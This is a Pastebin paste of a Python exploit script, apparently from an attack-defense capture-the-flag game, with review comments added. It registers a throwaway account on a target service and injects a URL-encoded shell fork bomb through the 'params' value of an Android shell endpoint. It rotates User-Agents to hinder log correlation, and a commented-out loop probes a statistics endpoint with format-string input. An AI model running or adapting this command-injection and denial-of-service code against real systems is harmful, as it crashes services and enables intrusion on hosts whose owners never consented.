
Untitled

a guest May 19th, 2019 83 Never
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3.  
  4. from __future__ import print_function
  5.  
  6. import re
  7. import os
  8. import random
  9. import string
  10. import requests
  11. from sys import argv
  12.  
  13. from os import environ as env
  14.  
  # Set TERM and TERMINFO in this process's environment (os.environ).
  # NOTE(review): the reason is not visible in this file -- presumably the
  # script is launched by a runner that has no terminal configured.
  env["TERM"] = "linux"
  env["TERMINFO"]="/etc/terminfo"
  # The bare string below is a usage reference for FakeSession. It follows the
  # imports and statements above, so it is not the module docstring.
  """
      FakeSession reference:
          - `s = FakeSession(host, PORT)` -- creation
          - `s` mimics all standard request.Session API except of fe features:
              -- `url` can be started from "/path" and will be expanded to "http://{host}:{PORT}/path"
              -- for non-HTTP scheme use "http://{host}/path" template which will be expanded in the same manner
              -- `s` uses random browser-like User-Agents for every requests
              -- `s` closes connection after every request, so exploit get splitted among multiple TCP sessions
      Short requests reference:
          - `s.post(url, data={"arg": "value"})`          -- send request argument
          - `s.post(url, headers={"X-Boroda": "DA!"})`    -- send additional headers
          - `s.post(url, auth=(login, password)`          -- send basic http auth
          - `s.post(url, timeout=1.1)`                    -- send timeouted request
          - `s.request("CAT", url, data={"eat":"mice"})`  -- send custom-verb request
          (response data)
          - `r.text`/`r.json()`  -- text data // parsed json object
  """

  """ <config> """
  # SERVICE PORT
  PORT = 8000
  # Target host, read from the first command-line argument when the module is
  # loaded. Running without an argument raises IndexError here, before the
  # __main__ guard (and its try/except) is reached.
  IP = argv[1]
  #IP = ''
  # DEBUG enables verbose output of all socket messages
  # NOTE(review): os.getenv returns a string, so any non-empty value of the
  # DEBUG variable -- including "0" or "false" -- is truthy and turns this on.
  DEBUG = os.getenv("DEBUG", False)
  42.  
  43. """ <body> """
  def steal(host = IP):
      """Register a throwaway account, add a device, then call its shell endpoint.

      Every request goes to ``host`` on ``PORT`` through a FakeSession. The
      default for ``host`` is bound to ``IP`` once, when the function is defined.

      The final GET carries a ``params`` value that is URL-encoded shell text
      rather than ordinary arguments (see the comment at that call). Nothing is
      returned; the body of the last response is printed.
      """
      s = FakeSession(host, PORT)
      # Random username/password for a single-use account.
      login = rand_string()
      passw = rand_string()
      repl = s.post("/api/registration",
                    json={'username': login, 'password': passw})


      # print(repl.text)


      repl = s.post("/api/login",
                    json={'username': login, 'password': passw})

      # print(repl.headers)
      # The login response is expected to carry an Authorization header, which
      # is replayed on the following requests; if it is absent this line raises
      # KeyError.
      headers = {'Authorization': repl.headers['Authorization']}
      # print("----------")

      # Create a device record of type 'WORKER' under the new account; its
      # random serial number is reused in the URL of the next request.
      serial = rand_string()
      repl = s.post("/api/android",
                    json={'name': rand_string(), 'serialNumber': serial, 'password': rand_string(), 'type': 'WORKER'}, headers=headers)
      # print(repl.text)
      # print(repl)

      # The `params` query value decodes to a `;`, a shell function that pipes
      # into itself in the background, a call to that function, and a trailing
      # `#` -- a process-exhaustion pattern, not data theft despite the
      # function's name.
      # NOTE(review): this has an effect only if the service builds a shell
      # command line from `params`. On the server side the endpoint should pass
      # arguments as an argv list (no shell) or allow-list them, and the service
      # should run under a process-count limit.
      repl = s.get(
          '/api/android/{}/shell/OS?params=;bomb()%7B%0A%20%20bomb%20%7C%20bomb%20%26%20%0A%7D%0Abomb#'.format(serial), headers=headers)
      print(repl.text, flush=True)
      # Disabled code left by the author: a loop over user ids against the
      # statistics endpoint with a `format` query value, and a plain GET.
      # print("----------")
      # for i in range(50, 10000):
      #     repl = s.get("/api/user/"+ str(i) + "/statistics?format=f%251%24s", headers=headers)
      #     print (repl.text, flush=True)
      #s.get("/index.php")
  76.  
  77. """ </body> """
  78.  
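  def die(msg):
      """Print *msg* to stdout and terminate the process with exit status 1.

      Raises:
          SystemExit: always, with code 1.
      """
      print(msg)
      # Raise SystemExit directly: the `exit` builtin is injected by the `site`
      # module and is missing when the interpreter is started with -S.
      raise SystemExit(1)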
  82.  
  def log(obj):
      """Return *obj* unchanged, printing it first when DEBUG is truthy."""
      if not DEBUG:
          return obj
      print(obj)
      return obj
  87.  
  def fake_flag():
      """Return a random decoy string: 31 uppercase letters/digits followed by "="."""
      charset = string.ascii_uppercase + string.digits
      body = rand_string(N=31, alph=charset)
      return body + "="
  90.  
  def rand_string(N=12, alph=string.ascii_letters + string.digits):
      """Return a string of *N* characters, each drawn with random.choice from *alph*.

      The `random` module is not a cryptographic generator, so the result is
      suitable for throwaway identifiers only; values that must be
      unpredictable should come from `secrets`.
      """
      picked = []
      for _ in range(N):
          picked.append(random.choice(alph))
      return ''.join(picked)
  93.  
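  class FakeSession(requests.Session):
      """requests.Session bound to one host[:port], with per-request header overrides.

      Differences from a plain Session, all implemented in this class:
        - a URL starting with a single "/" is expanded to
          "http://<hostport><url>";
        - any other URL is passed through str.format(host=<hostport>), so a
          literal "{" or "}" in it has to be doubled;
        - every prepared request gets a User-Agent picked at random from
          USER_AGENTS (replacing a caller-supplied one) and "Connection: close".

      Relative paths are expanded with the http:// scheme, so credentials and
      Authorization headers sent that way are not protected in transit.
      NOTE(review): because the User-Agent changes on every request and each
      request asks for the connection to be closed, server-side logging that
      needs to correlate this client's requests has to key on something else,
      such as the account or token used.
      """

      USER_AGENTS = [
          """Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15""",
          """Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36""",
          """Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201""",
          """Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13; ) Gecko/20101203""",
          """Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0"""
      ]

      def __init__(self, host, port):
          """Store "<host>:<port>", or just *host* when *port* is falsy."""
          super(FakeSession, self).__init__()
          self.hostport = "{}:{}".format(host, port) if port else host

      def prepare_request(self, request):
          """Prepare *request* as the base class does, then override two headers."""
          prepared = super(FakeSession, self).prepare_request(request)
          # Set after the base class has merged headers, so these values win
          # over session-level and per-call headers.
          prepared.headers['User-Agent'] = random.choice(FakeSession.USER_AGENTS)
          prepared.headers['Connection'] = "close"
          return prepared

      def request(self, method, url,
              params=None, data=None, headers=None, cookies=None, files=None,
              auth=None, timeout=None, allow_redirects=True, proxies=None,
              hooks=None, stream=None, verify=None, cert=None, json=None):
          """Expand *url* against the bound host and delegate to Session.request.

          All other arguments are forwarded unchanged. Returns the Response;
          when DEBUG is truthy a one-line summary is printed as well.
          """
          # startswith() instead of indexing: url[1] raised IndexError for ""
          # and for the bare path "/".
          if url.startswith("/") and not url.startswith("//"):
              url = "http://" + self.hostport + url
          else:
              url = url.format(host=self.hostport)
          # Forward explicitly rather than via locals(), which depended on the
          # implicit __class__ cell being present in the frame.
          r = super(FakeSession, self).request(
              method=method, url=url, params=params, data=data, headers=headers,
              cookies=cookies, files=files, auth=auth, timeout=timeout,
              allow_redirects=allow_redirects, proxies=proxies, hooks=hooks,
              stream=stream, verify=verify, cert=cert, json=json)
          if DEBUG:
              print("[DEBUG] {method} {url} {r.status_code}".format(method=method, url=url, r=r))
          return r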
  131.  
  132.  
  # Script entry point: run steal() once against the host given on the command line.
  if __name__ == "__main__":
      try:
          steal()
      # NOTE(review): the bare except discards every failure raised inside
      # steal(), including KeyboardInterrupt and SystemExit, so a failed run
      # ends silently with exit status 0.
      except:
          pass